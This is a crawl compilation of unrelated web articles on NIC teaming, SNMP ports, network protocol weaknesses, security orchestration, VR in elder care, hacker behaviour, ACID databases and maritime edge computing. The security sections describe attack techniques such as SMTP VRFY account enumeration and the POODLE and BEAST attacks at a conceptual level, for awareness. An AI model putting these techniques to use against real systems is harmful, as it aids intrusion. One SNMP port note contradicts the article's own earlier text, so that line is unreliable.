You can see an example of this in the below diagram. VM01 is sending 2 packets, one to address A and the other to address B. The NIC team receives the packets, performs a hashing algorithm (hence the name Address Hashing) on the destination details, and uses the results to determine the team member (physical NIC) that will send each packet. In this case, the packet being send to A goes via pNIC1 and the packet being sent to B is going via pNIC2.
In theory, this means that a virtual NIC can take advantage of all the available bandwidth in the NIC team, e.g. the full 2 Gbps or 20 Gbps. But this is completely dependent on the results of the hashing algorithm. Using the above example, if all data is going to address A, then all packets will travel through pNIC1.
And that brings us to a most common question about NIC teams and bandwidth. Say I have a host (or any server) that uses a nice big fat 20 GbE NIC team for Live Migration (or any traffic of a specific protocol). I want to test Live Migration and the NIC team. I pause the host, open up PerfMon and expect to see Live Migration using up all 20 Gbps of my NIC team. What is going on here, under the hood?
- Host1 is sending data to the single IP address of Host2 on the Live Migration network.
- Live Migration is sending packets down to the NIC team. The NIC team inspects each packet, and every one of them has the same destination details: the same MAC address, the same IP address, and same TCP port on Host2.
- The destination details are hashed and result in all of the packets being sent via a single team member, pNIC1 in this case (see the below figure).
- This limits Live Migration to the bandwidth of a single team member in the team.
That doesn’t mean Live Migration (or any other protocol – I just picked Live Migration because that’s the one Hyper-V engineers are likely to test with first) is limited to just a single team member. Maybe I have a 3rd host, Host3, and pausing Host1 will cause VMs to Live Migrate to both Host2 and Host3. The resulting hashing of destination addresses might cause the NIC team to use both team members in Host1 and give me a much better chance at fully using my lovely 20 GbE NIC team (other factors impact bandwidth utilization by Live Migration).
A misconception of Address Hashing is that packet1 to addressA will go via teamMember1, and pack2 to the same address (addressA) will go via teamMember2. I have shown that this is not the case. However, in most situations, traffic is going to all sorts of addresses and ports, and over the long term you should see different streams of traffic balancing across all of the team members in the NIC team … unless you have a 2 node Hyper-V cluster and are focusing on comms between the two hosts. In that case, you’ll see 50% utilization of a 2-team-member NIC team – and you’ll be getting the FO part of LBFO until you add a third host.
If you configure a team in the GUI, you are only going to see Hyper-V Switch Port or Address Hash as the Load Balancing Mode options. Using PowerShell, however, and you can be very precise about the type of Address Hashing that you want to do. Note that the GUI “Address Hashing” option will use these in order of preference depending on the packets:
- TransportPorts (4-Tuple Hash): Uses the source and destination UDP/TCP ports and the IP addresses to create a hash and then assigns the packets that have the matching hash value to one of the available interfaces.
- IPAddresses (2-Tuple Hash): Uses the source and destination IP addresses to create a hash and then assigns the packets that have the matching hash value to one of the available interfaces. Used when the traffic is not UDP- or TCP-based, or that detail is hidden (such as with IPsec)
- MacAddresses: Uses the source and destination MAC addresses to create a hash and then assigns the packets that have the matching hash value to one of the available interfaces. Used when the traffic is not IP-based.
My rule of thumb for Address Hashing is that I’ll use it for NIC teams that are nothing to do with a Hyper-V virtual switch, such as a NIC team in a non-host server, or a NIC team in a host that is nothing to do with a virtual switch. However, if I am using the NIC team for an external virtual switch, and I have fewer virtual NICs connecting to the virtual switch than I have team members, then I might use Address Hashing instead of Hyper-V Switch Port.
WS2012 R2 added a new load distribution mode called Dynamic. It is enabled by default and should be used. It is a blend of Address Hashing for outbound traffic and Hyper-V Port for inbound traffic. Microsoft urges you to use this default load balancing method on WS2012 R2.
This information has been brought to you by Windows Server 2012 Hyper-V Installation and Configuration Guide (available on pre-order on Amazon) where you’ll find lots of PowerShell like in this script: | <urn:uuid:0484a57d-50ec-4676-9578-596a87869b2f> | CC-MAIN-2022-40 | https://aidanfinn.com/?p=14032 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00288.warc.gz | en | 0.92533 | 2,051 | 2.515625 | 3 |
Simple Network Management Protocol (SNMP) is very popular in remote monitoring applications, so it's likely you'll work with it at some point.
You'll have questions when configuring your SNMP gear like "What port does SNMP use?" or "Does SNMP use TCP or UDP?"
Feel free to message us for any help you may need. If not, here are some of the key defaults to keep in mind as you get started:
SNMP uses both port 161 and port 162 for sending commands and messages.
The "SNMP manager" at the head of your system sends commands down to a network device, or "SNMP agent," using destination port 161.
When the agent wants to report something or respond to a command, an agent will send an "SNMP trap" on port 162 to the manager.
These two ports are fundamental defaults. They are the same in all versions of SNMP, since SNMP v1.
There are two types of protocols used in the Transport Layer (a sub-division of the IP layer): Transmission Control Protocol (TCP) and User Datagram Protocol (UDP). SNMP can be implemented over both protocols via LAN. While SNMP over TCP port is possible, SNMP packets are typically sent over UDP.
TCP vs UDP Communication
TCP is connection based, meaning that one program is connected to another program and they send messages across the internet to each other. TCP is relatively heavy, meaning it requires three packets to set up a connection before user data can be sent.
While TCP can be used for SNMP, it was originally designed with UDP transport only. While UDP may not have all the functionality of TCP, this actually makes it better for some applications. UDP is faster than TCP because it does not order packets (which can be done by the application layer), and it is a connection-less protocol. UDP is actually better suited for repetitive, low-priority functions like alarm monitoring.
Therefore, typically, SNMP uses UDP port 161 and UDP port 162.
Note: Agents use UDP 161, while the manager uses UDP 162.
SNMP is community-based, so there's the concept of "community string" that needs to be understood. Fortunately, it's really quite simple.
An SNMP community is something like a VLAN in the SNMP layer. Devices (management stations called "managers" and their managed devices called "agents") include a small text "community string" with each message. A receiving device will discard any message if that string doesn't match its own.
The default SNMP community string is "public" for the vast majority of devices. It's quite common for users to never change from this default, allowing all SNMP agents in the network to communicate with the (usually single) manager.
You might initially view the use of the default community string "public" as a security hole. It feels a bit like using a default password. Even the word "public" describes the people you need to keep out of your secured system.
It's probably a bigger problem, though, to think the community string offers much security at all. Even though you can obstruct unauthorized SNMP traffic by using a non-standard community string, that's not much of an obstacle for a determined intruder.
SNMP (other than SNMPv3) is unencrypted, so a "secret" community string is easy to learn. You should view the community string as a way to control the structure of management information in your network. It's not a security tool. Take care of that challenge in another layer, and/or deploy only SNMPv3-capable devices and activate encryption.
SNMPv3 is the most secure version of the SNMP protocol. The SNMPv3 port is the same port used for SNMPv1 or SNMPv2c. You'll need the port 161 for polling and 162 for notifications (trap messages, for example).
Any manufacturer can make a device SNMP-capable, so there must be an agreed-upon standard to allow managers and agents and communicate.
That standard is the Management Information Base (MIB). This is a human-readable ASN.1 text file that is parsed by the SNMP manager. It's a bit like a driver file that shares the various things that an SNMP-equipped device can do.
If you need to understand the specifics of your SNMP device, the MIB is a great place to look. It's a bit cryptic at first, but you'll get the hang of it fairly quickly.
Some examples of RTUs with UDP capability are the NetGuardian 832A, NetGuardian 216 and the NetGuardian LT by DPS Telecom. These RTUs are SNMP compatible and range in discrete input size, allowing your company to select the RTU that fits your needs perfectly. Additionally, they all have UDP capability.
The NetGuardian 832A has 32 discrete alarms and 8 analog alarms, pings 32 network elements, controls 8 relays, provides LAN reach through access to 8 serial ports, and reports via SNMP v3. Even though it fits in just 1 ru of rack space, it is perfect for larger sites.
The NetGuardian 832A G5 has dual Ethernet support for secure network access - both NICs have access to the NetGuardian but not to each other. Additionally, the NetGuardian 832A G5 features a wide range of options and expansion units, so that you get a unit with the perfect capacity for your specific needs.
With this NetGuardian, you can not only send SNMP Traps, but you can also monitor a wide range of other units and sensors. For a large network, the NetGuardian 832A has the ability to report alarms to multiple SNMP managers or TMon Remote Alarm Monitoring System, so it's easier than ever to support a more secure redundant master architecture.
The NetGuardian 216 is a mid-sized RTU. It has the capacity to monitor 16 discrete alarms and 8 analog alarms, pings 32 network elements, controls 2 relays, provides LAN reach-through access to 7 network elements, and reports via SNMP. As mentioned above, the NetGuardian 216 works with the SMS Receiver (discussed below) to report alarms via SMS, either direct to your mobile phone or to your alarm master. You'll be the first to know about a problem.
The smallest of the three RTUs is the NetGuardian LT. The NetGuardian LT G2 is a compact, LAN-based, and rack-mounted remote telemetry unit (RTU). This device is easy to install and features a light capacity - making it the perfect RTU to deploy at small remote sites with just 4 discretes.
Based on the time-tested NetGuardian design, this telco-grade remote is housed in a durable aluminum chassis and is scaled to be a perfect-fit solution where a large capacity RTU would be more than you need. It can also have 1 analog input and can support SNMP. With other options available, this RTU, as well as the others are customizable to fit your monitoring need.
Yet another SNMP transport method is by SMS message via an SMS receiver. Your wireless RTU sends alarms to the SMS receiver and then forwards them to your master station. As normal, the master station then alerts techs or other appropriate personnel that there is a problem.
The SMS Receiver by DPS Telecom allows you to use your wireless RTUs with your alarm master station without paying for an expensive third-party data provider or opening a hole in your firewall to receive alarms on your master station.
Wireless RTUs previously created a lot of unwanted trouble for companies. To send alarms to your master station, you had to pay your cellular carrier or a third-party data provider for a static IP address. Then, you had to punch a hole in your firewall to get that data back into your network - a security risk that some IT departments simply weren't willing to take.
Rather than reporting alarms over IP, simply configure your wireless RTU to send SMS alarm notifications to your SMS Receiver. The SMS Receiver then parses the SMS Notification and forwards an SNMP trap to your T/Mon or alarm master station over LAN.
Reporting alarms via SMS rather than IP allows you to bypass the traditional hassles of wireless IP-based alarm reporting. One SMS Receiver can report alarms for multiple RTUs as well, allowing you to cheaply and easily employ wireless RTUs or establish a backup alarm-reporting path over wireless devices.
We've been helping companies with their network monitoring systems since 1986. If you need help with your project, let us know how we can help!
You need to see DPS gear in action. Get a live demo with our engineers.
Download our free SNMP White Paper. Featuring SNMP Expert Marshall DenHartog.
This guidebook has been created to give you the information you need to successfully implement SNMP-based alarm monitoring in your network.
Have a specific question? Ask our team of expert engineers and get a specific answer!
Sign up for the next DPS Factory Training!
Whether you're new to our equipment or you've used it for years, DPS factory training is the best way to get more from your monitoring.Reserve Your Seat Today | <urn:uuid:fdb29ca5-27cc-4d88-991d-966dd76f5fdb> | CC-MAIN-2022-40 | https://ih1.dpstele.com/snmp/transport-requirements-udp-tcp.php | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00288.warc.gz | en | 0.92105 | 1,938 | 3.0625 | 3 |
Vulnerable Networks and Services – a Gateway for Intrusion
Communication and network protocols form a big part of the cyber-attack landscape. Therefore, many threats are directed toward the networks or communication channels used by people, systems, and devices. At a time when there are millions of IoT devices, employees bringing their personal devices to the workplace due to BYOD, the adoption of the cloud, and many organizations depending on web-based systems, this is obvious why cyber criminals consider networks and communication channels a sweet spot to carry out attacks. There are therefore many attack techniques and tools that have been developed purposefully to exploit common vulnerabilities in networks and communication channels.
Vulnerable network protocols and network intrusions
Networks, including the internet, were established at a time when there were hardly any cybersecurity threats aimed at them. Therefore, a lot of focus was given to aspects such as performance and speed. Since there was no security design during the establishment of early networks, several adoptions have had to be incorporated due to shifts such as increased cybersecurity threats. However, this is becoming a catch-up game and hackers are unfortunately growing more powerful. This has seen several vulnerabilities being discovered in network protocols. The following are some internet protocols that are increasingly becoming insecure
Simple Mail Transfer Protocol
Simple Mail Transfer Protocol (SMTP) is used for email purposes by many organizations. This protocol was added to the internet and it quickly became the simplest way for people and organizations to send and receive emails. However, there has been an explosion of threats targeting the SMTP protocol that many organizations use. Since SMTP wasn’t conceived with these security issues in mind, it has become the burden of network administrators to secure it. One of the ways that SMTP is attacked is account enumeration. This is normally done by spammers and phishers when harvesting emails. Account enumeration verifies whether an email account is registered on a certain server by running an SMTP command called VRFY on port 25. The response obtained shows whether or not the email is valid
Secure Sockets Layer
Secure Sockets Layer (SSL) has been understood by many people as the ultimate check of security. Users are being advised to check whether a website has SSL before they submit private data to it. SSL works by encrypting data exchanged between a host and server thus making it hardly possible for a hacker to intercept and read the contents of the traffic. However, there is a challenge with this approach toward cybersecurity as the ultimate check for security. SSL has been active since 1996 and has never received any update despite the increased sophistication of hacking techniques. There have been several attacks against SSL security that have made browsers such as Chrome and Firefox want to scrap SSL. The answer to SSL has been Transport Layer Security (TLS) but it isn’t without flaws. TLS came in 1999 as a successor of SSL version 3.0 but still SSL is more commonly used on the internet.
TLS is a crypto-protocol used in internet communications to provide end-to-end encryption for all data exchanged between a client and a server. It’s more secure than SSL but still faces its fair share of cyber attacks. One of the attacks against TLS is known as BEAST and is registered as CVE-2011-3389 by the CVE database. In this attack, the attacker injects their own packets into the stream of SSL traffic and this enables them to determine how the traffic is being decrypted and thus decrypt the traffic. Another attack against SSL is POODLE, which is registered as CVE-2014-3566 by the CVE database. POODLE is an ingenious way of attacking SSL used in man-in-the-middle attacks. When a client initiates the SSL handshake, the attacker intercepts the traffic and masquerades as the server and then requests the client to downgrade to SSL 3.0. The POODLE attack happens when the attacker replaces the padding bytes in packets and then forwards the packets to the real server. Servers don’t check for values in the padding, they’re only concerned with the message-authentication code of the plaintext and the padding length. The man in-the middle will then observe the response from the server to know what the plaintext message sent by the real client was.
Domain Name System
Domain Name System (DNS) is the protocol that ensures domain names are translated into IP addresses. However, this protocol is old, flawed, and open to attacks. A hacking group was once able to exploit the working of the protocol causing users that wanted to visit twitter.com to be redirected to a different domain. Therefore, should a significant number of threat actors decide to redirect visitors of some websites to different or malicious sites, they can do this through DNS attacks. This is where hackers swap the correct IP address of a website with a rogue IP address. There have been fixes being developed but they have had effects on performance and thus have not been implemented. More applicable fixes are still being developed. Apart from the internet, there are other attacks that are regularly directed at organizational networks. These are more successful due to the narrow scope within which attackers have to focus. The following are some of these attacks
This is where an attacker reads all data that’s being exchanged in a network, especially if it’s unencrypted. Surprisingly, there are many free and open source programs that can be used to do this, such as Wireshark. Public networks, such as cafe WiFi hotspots, are some of the areas where hackers regularly use these programs to record, read, and analyze the traffic flowing through the network.
Distributed denial of service
Distributed denial of service (DDoS) is an increasingly common attack that has been proven to be successful against big targets. Since the 2016 attack on Dyn, one of the largest domain-resolution companies, hackers have been motivated to use this attack on many organizations. There are ready vendors on the dark web that can rent out their botnets to be used for DDoS attacks for a given duration. One of the most feared botnets is Mirai, which is primarily composed of many IoT devices. DDoS attacks are aimed at directing a lot of illegitimate traffic to a network – more than can be handled – thus causing it to crash or be unable to handle legitimate requests. DDoS attacks are particularly of great concern to organizations that offer their products or services via websites as the attack makes it impossible for business processes to take place.
My next article will continue on Vulnerable Networks and Services – a Gateway for Intrusion topic. I will cover Attacking web servers and web based systems, techniques and tools used in those attacks … So please come back .
In the mean time you can check the below articles , if you have not done so yet.
What is a trusted operating system ?
5 Important Cyber Threat Intelligence Resources
Great recommendations to Implementing Network Segmentation and Segregation by Australian Government :
6 definitions for vulnerable networks | <urn:uuid:c98b21d9-5f54-4eba-8a8f-c67aaf2f9f86> | CC-MAIN-2022-40 | https://www.erdalozkaya.com/vulnerable-networks-and-services/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00288.warc.gz | en | 0.96458 | 1,427 | 3 | 3 |
Automation has always been a big part of technology, from the earliest machines of the industrial revolution to modern robots. We have managed to greatly expand the list of devices we can automate, but these efforts are still mostly relegated to rules-based, repetitive tasks. This can be great for humans, acting as a force multiplier and leaving us those tasks that are outside the rules, requiring judgment and insight.
Cybersecurity is no stranger to the forces of automation, and it is now a central goal for many organizations as they try to respond faster to more threats with limited resources.
The next phase of automation is orchestration, stitching together automated tasks into workflows. The goal of security orchestration is not to replace the human, but to augment human skills by linking the people, processes, and technology involved to speed up detection, investigation, and response. A level of human interaction still exists, where you want the right person to see and apply judgement at the right time.
Security orchestration involves more than just security operations; it has to be aware of and even encode business processes and policies. For example, if a data loss prevention system identifies and possibly blocks an attempted data exfiltration, it may be necessary to quickly communicate with the user’s manager, human resources, or legal, not just the security department. Processes in the affected departments, their data owners, and related workloads may also need to be triggered.
Orchestration forces and encourages higher levels of communication and integration among the various components, including endpoints, data centers, clouds, and threat management. The more they can see and hear each other, the better job each one can do. Just like an orchestra cannot play with isolated musicians and instruments, security can’t effectively operate without integration.
When automating and orchestrating security, there is an initial appearance of overwhelming complexity. However, orchestration actually helps reduce complexity by identifying it in manageable chunks, forcing the development of rules and processes, and leaving the judgment-related items for humans to work on. This reduces overall load on the work force and speeds up reaction times.
In addition to these benefits, orchestration also stitches together humans. By assigning tasks to appropriate team members, it can help with skill development, training, and education. Task assignment can be broadened to include supplementary resources from other departments during periods of high demand, or assigned to junior/senior pairs during times of lower demand.
The proliferation of data and devices cannot be adequately protected from the dramatic increase in threat volume by siloed security tools and the ongoing shortage of security professionals. Automation and orchestration are the only way we are going to resolve more risks, faster, with fewer resources. | <urn:uuid:a9fada00-3292-42fb-be9a-5ab515cb68d7> | CC-MAIN-2022-40 | https://www.darkreading.com/intel/automate-and-orchestrate-workflows-for-better-security | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00488.warc.gz | en | 0.950776 | 551 | 2.640625 | 3 |
leungchopan - Fotolia
Elderly and handicapped people in a municipality in south Stockholm, Sweden, will soon have access to virtual reality (VR) tools as a first step in a more extensive plan to use VR to improve mental health.
The first users, in the municipality of Huddinge, are people who live in specific care units. Care workers will be able to improve communication with residents and provide virtual experiences to help with mental health issues.
Department staff have already carried out a small pilot test with three residents and will this year embark on a longer test in which about 60 residents will be offered VR, should they like to try it.
Development leader Dana Hagström is convinced the project will prove interesting for most of the residents it will be offered to.
“We will try this on two categories of residents – the elderly and residents with cognitive disabilities,” said Annika Sefbom, section manager in Huddinge’s department for social and elder care.
The pilot will involve both elderly residents in housing units designed specifically for their needs, and young people with special needs and cognitive disorders who also live in the area.
Huddinge has tried such unconventional care methods before. Some of the staff who provided daily help to residents also had technical skills and decided to use the game World of Warcraft to communicate with a resident who had an autistic behavioural disorder. It was found to be easier to communicate with that person via the tool.
Unfortunately, carers’ jobs are considered temporary and the staff who worked with this resident have since left their jobs.
Now the department’s leaders want to use VR, and see no limit to what digital tools can achieve in improving caregiving in their units and the life experience of residents there.
“We started our digitisation journey a long time ago and a few years ago, we were using World of Warcraft with some residents,” said Hagström. “It meant that they got more trustful and would let our staff come into their homes.
“Some home aid workers were also, privately, gamers and as a result had the required technical skills. When they left, no one used World of Warcraft any longer. However, we always remembered that we needed to add value, something extra, to do even better.
“Later on, we started speaking about what we could do with VR – almost jokingly, to start with. Our experience with World of Warcraft was something at least similar to build on. The idea came to us five or six years ago and the real project started about a year ago as a trial.”
Read more about tech in healthcare in the Nordics
- Nordic tech startups are applying their skills to solving some of the challenges for the region’s healthcare sector.
- The Nordic region's tech startup industry is geared towards creating tech in the healthcare sector, with apps aimed at the elderly a growing segment.
- One man’s blog in Sweden turned into a healthcare app to support cancer sufferers and is now expanding globally.
At the beginning of 2019, Huddinge municipality contacted a company that could enable it to try out VR glasses. It then had to find money for the trial, which can be tricky for local authorities, not least because there are no scientific studies confirming the effectiveness of VR in helping people with cognitive problems or dementia.
The head of the department decided to make a start on the programme and at least one politician on the council took an interest and asked for more information.
Hagström said department staff and leadership looked at the VR tools and tried the technology on themselves. Another test was carried out on some of the elderly residents.
One elderly woman who took part wore VR glasses and experienced virtual farm life, something well known to her – her father had run a farm and she used to help him with it. Seeing and experiencing what it was like to be on a farm brought excitement and joy to the woman.
When considering the other group of intended VR users, handicapped citizens, the department chose to include residents with severe mental disabilities as well as mobility problems – people who are the hardest to reach.
“We have people here who are very locked in emotionally,” said Hagström. “We can’t get through to them easily, even to talk about normal daily things. We have therefore made a brave decision to try VR on them first and not on other groups to find out if we can get results.”
Sefborn added: “It also makes it easy to talk with residents. The VR experience is a fantastic new tool.”
The department is now on the lookout for technically skilled staff to work on the project, which will run for three years. The team hopes that other departments will also try out VR technology. | <urn:uuid:b4b606af-7175-4b13-b7d8-6cdd0970e47c> | CC-MAIN-2022-40 | https://www.computerweekly.com/news/252478690/Swedish-council-tests-virtual-reality-in-care-for-vulnerable-people | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00488.warc.gz | en | 0.973433 | 1,001 | 2.6875 | 3 |
Have you ever wondered what are hackers like, where they are based, and what are they thinking?
They are human like everyone else – you wouldn’t be able to tell a hacker from a regular programmer. But they are often extremely smart software engineers who understand how the world of IT works, invariably a lot better than an average developer, so it’s no wonder that sometimes they end up being employed by government agencies.
Ethical hackers are helping build our defenses against data breaches and cybercrime, protect privacy, and restore trust about the digital landscape. Unfortunately, there are hackers that use their intelligence for malicious purposes and are occasionally influenced by ideologies or motivations that are not widely accepted. They leverage malware, hacking tools, and stolen identity documents from the dark web to penetrate companies’ systems.
Hackers operate across all geographies, but our systems at BOS Framework see most hacker attacks from China, Russia, Pakistan, and North Korea. This could be a strategic “counter alliance” in a bid to push for a greater bipolarity in world affairs. But with many of these geographies representing large low-income populations, hacking can appear to be a lucrative alternative.
Although some hackers are state sponsored for political reasons or work for terrorist organizations, they usually work for themselves and collect ransoms. For some hackers, breaking into forbidden places may simply seem like a fun pastime.
Fractured architecture from a hacker’s perspective
A typical company doesn’t have a single application – they have many, built over many years, by various people without a common architecture standard, creating a constantly changing landscape of technologies, infrastructure, and processes.
These applications are comprised of many layers: the front-end, the web or mobile application that the end-user interacts with, the APIs, the databases, and the various servers where applications and databases are hosted. The communications and data flow through this ecosystem should follow the correct principles by being transient and privilege-based, called network isolation control. For example, when users log in by entering their login credentials from the front-end, they will have specific privileges that will only allow selective access to certain data.
Developers are invariably specialists for only the front-end, API development, or databases. Their ability to perceive the entire system as one whole is somewhat challenged by their role in the organization and by their limitations of systemic understanding.
Typically, developers identify a problem and look for the simplest and fastest solution possible (patch-by-patch formula) without having the full context. A developer’s primary focus is on user experience or the quality of the application. If the immediate customer is satisfied, not through security but by delivering functionality, the company is unconcerned.
Furthermore, developers are not always trained on security and compliance, and security officers have little input on protocol or policy. Security teams only retroactively review applications and ecosystem security when systems are already in production – by that time, it is already too late.
What should be ingrained into the company DNA has become an after-the-fact consideration. If you have an infinite number of holes on a boat, it will eventually sink – that’s why companies are becoming obvious targets for hackers.
The key takeaway here is that any system built prior to 2019 will most likely have a very different architecture and underlying standard compared to what is needed today, given the increased escalation of cyber incidents. Most systems have not been designed to follow best practices such as distributed applications and data, the separation of protected health information (PHI) and personally identifiable information (PII), and strong observability, visibility, and traceability. Now is the time.
How hackers look for weaknesses on a day-to-day basis
The disconnect between security, developer, and operation teams isn’t necessarily visually represented. But the hacker is looking at the entire ecosystem for any possible vulnerability or disconnect to exploit. If a vulnerability appears to repeat itself in various areas in the ecosystem – across the authentication, authorization, databases, servers, and logging systems – and a hacker has already exploited one area, they will be able to package up their findings as a program and deploy it at scale.
There isn’t a comprehensive way to test security weaknesses. Certain tools have security scans and penetration tests, but they are generic in nature, like end-point protection or activity logs. There are many tests for functionality which is more discoverable, but security concerns are often only revealed when there’s an actual incident. The hacker knows that this problem exists, and they are searching for new systems that have not been tested yet. Therefore, they are interested in your development, demo, beta, and production environments.
Hackers are not bound by rules nor controls. They use automation, targeted programming, and various combinations of techniques to look for weaknesses in the code, databases, and infrastructure to unlock company defenses. Their automation routines keep working as they sleep.
Segmenting and distributing data puts hackers off
Security and resilience can only result from sound architecture that is based on best practices. A successful set-up is never about a single application: it should be viewed as the connective tissue that brings together a distributed ecosystem – intentionally designed to break different types of data, like PHI, PII, and financial data into smaller units.
Companies should never have data centralized in one location. Dispersal reduces the blast radius of a data breach. The data becomes useless by itself, and hackers cannot hold any piece of this data out for ransom unless they gather all the other important information at the same time.
Even as IT employment skyrockets and the IoT security testing market grows, especially SIEM and SOAR, it is unlikely that a hacker’s job will get harder. As more and more people take on employment, there will be less and less standardization, making it more exciting for hackers.
When a hacker doesn’t have to work for anyone and can be a self-employed “entrepreneur”, you can see why the job is so appealing. Hackers will always be present, like viruses, and they will always be able to enter systems. So, instead of creating defenses or resistance that are unbreachable, we must create breach resilience, redundancies, and auto-recovery capabilities. | <urn:uuid:229051ab-4d37-455a-8bbc-d91fdbe7c338> | CC-MAIN-2022-40 | https://www.helpnetsecurity.com/2021/11/11/humanizing-hackers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00488.warc.gz | en | 0.945572 | 1,294 | 2.953125 | 3 |
I don’t think it’s an overstatement to say that data is pretty important. Data is especially important for modern organizations. In fact, The Economist went so far as to say that data has surpassed oil as the world’s most valuable resource, and that was back in 2017.
One of the problems with data, though, is the massive amounts of it that need to be processed on a daily basis. There’s so much data being generated across the globe these days that we have to come up with a new term just to express how much data there is: big data. Sure, it’s not the most impressive-sounding term out there, but the fact remains.
With all this big data out there, organizations are seeking ways to improve how they manage it all from a practical, computational, and security standpoint. Like Spiderman’s Uncle Ben once said:
“With great [data] comes great responsibility.”
The best method the IT world has created for navigating the complexities of data management is through the use of databases.
What is a database?
Databases are structured sets of data that are stored within computers. Oftentimes, databases are stored on entire server farms filled with computers that were made specifically for the purpose of handling that data and the processes necessary for making use of it.
Modern databases are such complex systems that management systems have been designed to handle them. These database management systems (DBMS) seek to optimize and manage the storage and retrieval of data within databases.
One of the guiding stars leading organizations to successful database management is the ACID approach.
What is ACID?
In the context of computer science, ACID stands for:
Together, ACID is a set of guiding principles that ensure database transactions are processed reliably. A database transaction is any operation performed within a database, such as creating a new record or updating data within one.
Changes made within a database need to be performed with care to ensure the data within doesn’t become corrupted. Applying the ACID properties to each modification of a database is the best way to maintain the accuracy and reliability of a database.
Let’s look at each component of ACID.
In the context of databases, atomicity means that you either:
- Commit to the entirety of the transaction occurring
- Have no transaction at all
Essentially, an atomic transaction ensures that any commit you make finishes the entire operation successfully. Or, in cases of a lost connection in the middle of an operation, the database is rolled back to its state prior to the commit being initiated.
This is important for preventing crashes or outages from creating cases where the transaction was partially finished to an unknown overall state. If a crash occurs during a transaction with no atomicity, you can’t know exactly how far along the process was before the transaction was interrupted. By using atomicity, you ensure that either the entire transaction is successfully completed—or that none of it was.
Consistency refers to maintaining data integrity constraints.
A consistent transaction will not violate integrity constraints placed on the data by the database rules. Enforcing consistency ensures that if a database enters into an illegal state (if a violation of data integrity constraints occurs) the process will be aborted and changes rolled back to their previous, legal state.
Another way of ensuring consistency within a database throughout each transaction is by also enforcing declarative constraints placed on the database.
An example of a declarative constraint might be that all customer accounts must have a positive balance. If a transaction would bring a customer account into a negative balance, that transaction would be rolled back. This ensures changes are successful at maintaining data integrity or they are canceled completely.
Isolated transactions are considered to be “serializable”, meaning each transaction happens in a distinct order without any transactions occurring in tandem.
Any reads or writes performed on the database will not be impacted by other reads and writes of separate transactions occurring on the same database. A global order is created with each transaction queueing up in line to ensure that the transactions complete in their entirety before another one begins.
Importantly, this doesn’t mean two operations can’t happen at the same time. Multiple transactions can occur as long as those transactions have no possibility of impacting the other transactions occurring at the same time.
Doing this can have impacts on the speed of transactions as it may force many operations to wait before they can initiate. However, this tradeoff is worth the added data security provided by isolation.
Isolation can be accomplished through the use of a sliding scale of permissiveness that goes between what are called optimistic transactions and pessimistic transactions:
- An optimistic transaction schema assumes that other transactions will complete without reading or writing to the same place twice. With the optimistic schema, both transactions will be aborted and retried in the case of a transaction hitting the same place twice.
- A pessimistic transaction schema provides less liberty and will lock down resources on the assumption that transactions will impact other ones. This results in fewer abort and retries, but it also means that transactions are forced to wait in line for their turn more often in comparison to the optimistic transaction approach.
Finding a sweet spot between these two ideals is often where you’ll find the best overall result.
The final aspect of the ACID approach to database management is durability.
Durability ensures that changes made to the database (transactions) that are successfully committed will survive permanently, even in the case of system failures. This ensures that the data within the database will not be corrupted by:
- Service outages
- Other cases of failure
Durability is achieved through the use of changelogs that are referenced when databases (or portions of the database) are restarted.
ACID supports data integrity & security
When every aspect of the ACID approach is brought together successfully, databases are maintained with the utmost data integrity and data security to ensure that they continuously provide value to the organization. A database with corrupted data can present costly issues due to the huge emphasis that organizations place on their data for both day-to-day operations as well as strategic analysis.
Using ACID properties with your database will ensure your database continues to deliver valuable data throughout operations.
- BMC Machine Learning & Big Data Blog
- Data Architecture Explained: Components, Standards & Changing Architectures
- CAP Theorem for Databases: Consistency, Availability & Partition Tolerance
- Data Streaming Explained: Pros, Cons & How It Works
- Data Ethics for Companies
- 3 Simple Data Monetization Strategies for Companies | <urn:uuid:82d6b331-3a15-4a47-b44d-dd56d2a8fbea> | CC-MAIN-2022-40 | https://www.bmc.com/blogs/acid-atomic-consistent-isolated-durable/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00488.warc.gz | en | 0.937271 | 1,399 | 3.140625 | 3 |
Smart ships with automated systems are becoming increasingly dependent on real-time data processing. Edge computing may be the optimal solution to latency and connectivity challenges.
Keeping on pace with the rest of the industrial world, the maritime industry is continuously evolving and exploring new opportunities. Technological advances in areas such as automation, robotics, artificial intelligence, machine learning and the digital sphere in general have changed the game – and the way the industry does business.
Smarter ships, automated operations, proactive maintenance, improved security and better visibility across the supply-chain are prerequisites to meet the ever-growing demands for productivity, profitability and cost-efficiency, and many of these major advancements are direct results of the introduction of the Industrial Internet of Things (IIoT) around the turn of the millennium.
Since 2002, the IIoT has taken advantage of cloud technology to move an increasing amount of data storage and processing from centralized computer hubs and into the cloud.
The IIoT’s newest development – edge computing – takes this decentralization one step further.
Distributed processing architecture
The countless new opportunities that have emerged, are emerging and will emerge as a result of the IIoT revolution are all driven by the same essential resource: data. As such, results rely heavily on to main prerequisites: connectivity and sufficient bandwidth.
Data generation and collection is increasing exponentially and explosively – the notion that “90% of the world’s data were generated in the last two years” is already six years old – resulting in ever-increasing requirements for connectivity and bandwidth, accompanied by skyrocketing data center infrastructure and networking costs
What edge computing essentially does is to distribute data processing amongst a series of so-called gateway PCs, or simply gateways, located closer to the edge of your network and the devices and machinery performing tasks and operations, rather than processing all data in the cloud or in a centralized computer hub.
This distributed processing architecture reduces the system’s reliance on cloud connectivity, relieves the network of bandwidth congestion, reduces latency, and may additionally lower data center costs.
Edge computing explained
In a typical edge computing set-up, a gateway is installed as close as possible, and with a direct connection, to the sensors monitoring and collecting data from a designated sub-system or piece of machinery.
